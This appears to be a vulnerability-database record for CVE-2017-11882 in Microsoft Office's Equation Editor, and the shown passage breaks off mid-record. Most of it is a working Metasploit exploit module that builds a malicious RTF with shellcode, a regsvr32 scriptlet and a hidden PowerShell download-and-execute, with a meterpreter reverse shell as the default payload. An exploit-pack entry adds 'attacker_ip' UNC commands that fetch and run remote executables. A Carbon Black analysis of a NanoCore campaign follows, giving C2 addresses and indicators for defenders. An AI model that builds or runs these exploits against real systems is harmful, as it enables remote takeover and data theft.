CVE-2017-11882',\r\n 'Description' => %q{\r\n Module exploits a flaw in how the Equation Editor that\r\n allows an attacker to execute arbitrary code in RTF files without\r\n interaction. The vulnerability is caused by the Equation Editor,\r\n to which fails to properly handle OLE objects in memory.\r\n },\r\n 'Author' => ['mumbai', 'embedi'],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Nov 15 2017',\r\n 'References' => [\r\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\r\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [\r\n ['Microsoft Office', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' => {\r\n 'DisableNops' => true\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\r\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\r\n ])\r\n end\r\n\r\n def retrieve_header(filename)\r\n if (not datastore['FOLDER_PATH'].nil?)\r\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\r\n else\r\n path = nil\r\n end\r\n if (not path.nil?)\r\n if ::File.file?(path)\r\n File.open(path, 'rb') do |fd|\r\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\r\n header = header.to_s # otherwise I get nil class...\r\n print_status(\"Injecting #{path}...\")\r\n return header\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n return header\r\n end\r\n\r\n\r\n\r\n def generate_rtf\r\n header = retrieve_header(datastore['FILENAME'])\r\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\r\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\r\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\r\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\r\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\r\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\r\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\r\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\r\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\r\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\r\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\r\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\r\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\r\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\r\n\r\n\r\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\r\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\r\n shellcode << \"\\x9e\" # 6: 9e sahf\r\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\r\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\r\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\r\n shellcode << \"\\\\\" # 12: 5c pop esp\r\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\r\n shellcode << \"\\xee\" # 15: ee out dx,al\r\n shellcode << \"[\" # 16: 5b pop ebx\r\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\r\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\r\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\r\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\r\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\r\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\r\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\r\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\r\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\r\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\r\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\r\n shellcode << \"\\x53\" # 3e: 53 push ebx\r\n shellcode << \"\\x51\" # 3f: 51 push ecx\r\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\r\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\r\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\r\n shellcode << \"\\x53\" # 49: 53 push ebx\r\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\r\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n\r\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\r\n footer << '0000C5000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\r\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000001050000050000000D0000004D45544146494C'\r\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\r\n footer << '500000002001C0000000000050000000902000000000500000002'\r\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\r\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\r\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\r\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\r\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\r\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\r\n footer << '00030000000000' + \"\\n\"\r\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\r\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\r\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\r\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\r\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\r\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\r\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\r\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\r\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\r\n footer << \"00000000\\n\"\r\n footer << \"}}}\\n\"\r\n footer << '\\par}' + \"\\n\"\r\n\r\n\r\n payload = shellcode\r\n payload += [0x00402114].pack(\"V\")\r\n payload += \"\\x00\" * 2\r\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\r\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\r\n payload = header + object_class + payload + footer\r\n payload\r\n end\r\n\r\n\r\n\r\n def gen_psh(url, *method)\r\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\r\n\r\n if method.include? 'string'\r\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\r\n else\r\n # Random filename to use, if there isn't anything set\r\n random = \"#{rand_text_alphanumeric 8}.exe\"\r\n # Set filename (Use random filename if empty)\r\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\r\n\r\n # Set path (Use %TEMP% if empty)\r\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\r\n\r\n # Join Path and Filename\r\n file = %Q(echo (#{path}+'\\\\#{filename}'))\r\n\r\n # Generate download PowerShell command\r\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\r\n end\r\n\r\n download_and_run = \"#{ignore_cert}#{download_string}\"\r\n\r\n # Generate main PowerShell command\r\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n if _request.raw_uri =~ /\\.sct$/\r\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\r\n payload = gen_psh(\"#{get_uri}\", \"string\")\r\n data = gen_sct_file(payload)\r\n send_response(cli, data, 'Content-Type' => 'text/plain')\r\n else\r\n print_status(\"Delivering payload to #{cli.peerhost}...\")\r\n p = regenerate_payload(cli)\r\n data = cmd_psh_payload(p.encoded,\r\n payload_instance.arch.first,\r\n remove_comspec: true,\r\n exec_in_place: true\r\n )\r\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\r\n end\r\n end\r\n\r\n\r\n def rand_class_id\r\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\r\n end\r\n\r\n\r\n def gen_sct_file(command)\r\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\r\n if command == ''\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\r\n # If a command is provided, tell the target system to execute it.\r\n else\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\r\n end\r\n end\r\n\r\n\r\n def primer\r\n file_create(generate_rtf)\r\n end\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29119", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office - OLE Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-20T00:00:00", "title": "Microsoft Office - OLE Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-20T00:00:00", "id": "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "href": "", "sourceData": "Source: https://github.com/embedi/CVE-2017-11882\n\nCVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/\n\nMITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n\nResearch: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about\n\nPatch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html\n\nDEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410\n\nwebdav_exec CVE-2017-11882\n\nA simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.\n\nThe first command which triggers WebClient service start may look like this:\n\ncmd.exe /c start \\\\attacker_ip\\ff\nAttacker controlled binary path should be a UNC network path:\n\n\\\\attacker_ip\\ff\\1.exe\nUsage\n\nwebdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name\nSample exploit for CVE-2017-11882 (starting calc.exe as payload)\n\nexample folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43163.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2019-03-20T21:05:12", "description": "In analyzing the stream of raw emails seen in the wild, TAU discovered a campaign of what first appeared to be a fairly standard spear-phishing attack. The email contained a Word document which carried an exploit for [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>), a vulnerability that allows for Microsoft Office documents to run arbitrary code. This exploit is [nothing new](<https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/>), and Microsoft released a patch for this back in late 2017. This particular CVE exploits a memory corruption issue in the Equation Editor, found in certain versions of Microsoft Office. Successful exploitation of this vulnerability can lead to remote code execution on a vulnerable system. Nevertheless, we continued on with the investigation by pivoting on this particular Microsoft Word document, to then discover ten recent similar Word documents submitted to VirusTotal a total of 17 times within a four-day period in February. Out of the seventeen submissions, the majority were submitted from Italy, Czech Republic, Germany, Ukraine, United Kingdom and Austria. There were two that were submitted from the U.S, and one that was submitted from the United Arab Emirates.\n\nBehavioral Summary\n\nWhile this attack is based upon a malicious Word document, we can see the attack behavior take place using legitimate Windows applications such as the Office Equation Editor, an application used to generate complex mathematical equations. Equation Editor has a well-known vulnerability that is used in this instance to reach out to multiple online sites to download additional payloads. This behavior is tracked, as shown in the process tree below. The overall characteristics of the attack are also notable based upon the various TTPs used, also shown below in the alert summary.\n\n__\n\n\n\nDetails\n\nWhen the email attachment is opened, the Equation Editor process (**Eqnedt32.exe**) spawns under **svchost.exe** signifying the successful execution of the exploit embedded in the Word document. It then immediately calls out to a remote web address **hxxp://sunrypero.cf **and downloads a JPG file called **1126rjduu76.jpg**. (At the time this sample was detonated, this domain name was live. The domain had been registered with Freenom and used the top-level domain \u201c.cf\u201d, which was originally created for use by the Central African Republic). Despite hosting a Word document and 2 JPG graphic files at the sunrypero.cf domain, the JPG files were in fact found to be PE files.\n\n__\n\nOnce the particular JPG file is downloaded, it is saved into the users **%temp%** folder as \u201c**tryui.exe**\u201d. The icon for this file is shown below.\n\n__\n\nOddly, the actor(s) didn\u2019t include any error handling in their code, so if a HTTP request cannot be established, then the error message box (shown below) is displayed shortly after the Word document is opened.\n\n__\n\nA quick glance at the tryui.exe file returned the following string which pertains to the software known as AutoHotKey, version 1.1.23.00.\n\n__\n\nTaken from their [website](<https://www.autohotkey.com/>), \u201c_AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks such as: form fillers, auto-clicking, macros, etc_\u201d.\n\nMalware that exploits AutoHotKey isn\u2019t a new concept, and a quick search returned a tool written by Amit Serper called [ahk-dumper](<https://github.com/aserper/ahk-dumper>). This tool essentially dumps out the script from the RDATA section of the PE file. When run against the **tryui.exe** file it presented 143 lines of code (thank you Amit!). The code can be broken down into the following pieces:\n\n 1. Uses RegExReplace to hide the string \u201cCallWindowProc\u201d used by \u201cUser32.dll\u201d\n 2. Uses RegExReplace to hide the string showing a hard-coded path for the Microsoft Regasm utility at\u201cC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe\u201d\n 3. Uses \u201cInternetGetConnectedState\u201d used by \u201cwininet.dll\u201d to obtain a network connection, otherwise sleep for 1 second and retry\n 4. Create a COM object using \u201cWinHttpRequest.5.1\u201d in order to get the payload found at either hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg or hxxps://paste.ee/r/KyH5C\n 5. Copy downloaded file(s) into the user\u2019s %Temp% folder\n 6. Create file shortcut in Startup folder, and set file attributes to System, Hidden, ReadOnly\n\nThe last part is the base64 decoding routine, which uses a combination of the RegexReplace and Flip functions as shown below. The flip function simply reverses the order of the given string. The ltrim and rtrim trims characters either from the beginning (left) or end (right) of the string.\n\n\n\nPart of the base64 routine is shown below.\n\n\n\nIn other words, when the tryui.exe file runs, it downloads a base64 encoded string from hxxps://paste.ee/r/KyH5C address (which is a site that offers similar features to PasteBin), as well as another site which was temporarily used to host a second JPG file at hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg. Using the two separate base64 encoded strings, it compiles a binary which is then used to install and register the C2 and keylogger component.\n\n\n\nAs long as the Regasm.exe tool is found in the hard coded path shown above, the tryui.exe will invoke regasm and use it to merge the two base64 encoded strings in order to form a separate executable file. It places what appears to be a legitimate Regasm binary disguised as natmon.exe into the locations listed below for persistence. Comparing similar files suggests that this has been used to avoid detection.\n\nKey\n\n| \n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\NAT Monitor\\ \n \n---|--- \n \nName\n\n| \n\nNAT Monitor \n \nValue\n\n| \n\nC:\\Program Files (x86)\\NAT Monitor\\natmon.exe \n \nThe final part of the attack turns out to be the delivery of the NanoCore trojan which includes keylogger, which originally communicated back to it\u2019s C2 located in the Netherlands over an unencrypted channel over TCP port 2960. Shortly after testing this particular sample, the bad actor(s) soon updated their C2 to use SSL over TCP port 443 in order to hide the data sent to and from the C2 server.\n\n**Side note:**\n\nAs the path for Regasm.exe is hard coded within the AutoHotKey script, if Regasm.exe is not present in the same path, the malware will not run any further. However, copying a newer version of .NET\u2019s Regasm.exe from a more recent folder path e.g. \"C:\\Windows\\Microsoft.NET\\Framework\\**v4.x**\", permits **tryui.exe** to launch Regasm and register an application.\n\nWhile none of the above techniques are necessarily new, it is interesting to see how AutoHotKey continues to grow in popularity amongst malware authors, and how malicious scripts embedded within the legitimate AutoHotKey compiled binary are becoming more sophisticated in order to attempt to fly under the radar of modern day detection and prevention security products.\n\nIf you are a Carbon Black customer and looking for more information on how CB products defend against this attack, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-NanoCore-Old-Malware-New-Tricks/ta-p/69286#M2641>)\n\nRemediation:\n\n**MITRE ATT&amp;CK TIDs **\n\nTID\n\n| \n\nTactic\n\n| \n\nDescription \n \n---|---|--- \n \n[T1204](<https://attack.mitre.org/techniques/T1204/>)\n\n| \n\nExecution\n\n| \n\nUser execution via opening of email attachment \n \n[T1027](<https://attack.mitre.org/techniques/T1027/>)\n\n| \n\nDefense Evasion\n\n| \n\nObfuscated files or information \n \n[T1121](<https://attack.mitre.org/techniques/T1121/>)\n\n| \n\nDefense Evasion, Execution\n\n| \n\nProxying of code execution through Regasm \n \n[T1203](<https://attack.mitre.org/techniques/T1203/>)\n\n| Execution | Exploitation for Client Execution \n \n[T1036](<https://attack.mitre.org/techniques/T1036/>)\n\n| \n\nDefense Evasion\n\n| \n\nMasquerading \n \n[T1060](<https://attack.mitre.org/techniques/T1060/>)\n\n| Persistence | Registry Run Keys / Startup Folder \n \n[T1121](<https://attack.mitre.org/techniques/T1121/>)\n\n| Defense Evasion, Execution | Regsvcs/Regasm \n \nIndicators of Compromise (IOCs)\n\nIndicator\n\n| \n\nType\n\n| \n\nContext \n \n---|---|--- \n \n88334ec58de64e4a174dbf8b7027f916\n\ncfea6ae1730a9dd580e2d5b633f1785357d50af8e07768081b3f50139144259b\n\n| \n\nMD5\n\nSHA256\n\n| \n\nQuotation_Sheet_#RFQ190207.doc Word Document \n \n20bc6c4211538b4eb7a756cfafeb0c39\n\n3c32a519c6ea39670cb610a190cdcf3acd9a7e00b11d93d05d7395a2de0bb1ff\n\n| \n\nMD5\n\nSHA256\n\n| \n\nTryui.exe \n \n780492fd6099b8e29fb10b454a1d7b13\n\n391276372a25e0c0b5a4650d6454dbea85cc2e941970a2ccd7a42323b7e82141\n\n| \n\nMD5\n\nSHA256\n\n| \n\nNanocore \n \nhxxp://sunrypero.cf\n\n| \n\nURL\n\n| \n\nC2 \n \nhxxps://paste.ee/r/KyH5C\n\n| \n\nURL\n\n| \n\nC2 \n \nhxxps://share.dmca.gripe\n\n| \n\nURL\n\n| \n\nC2 \n \n185.244.30.106\n\n| \n\nIP\n\n| \n\nC2 \n \nThe post [TAU Threat Intelligence Notification: NanoCore - Old Malware, New Tricks!](<https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 